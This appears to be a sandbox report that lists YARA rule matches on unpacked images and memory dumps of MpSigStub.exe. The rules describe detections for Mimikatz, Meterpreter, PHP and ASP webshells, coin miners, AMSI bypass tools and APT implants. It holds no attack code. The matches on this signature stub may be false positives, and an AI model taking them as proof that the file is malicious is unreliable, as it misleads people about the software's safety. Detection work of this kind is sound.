Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6332385174.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
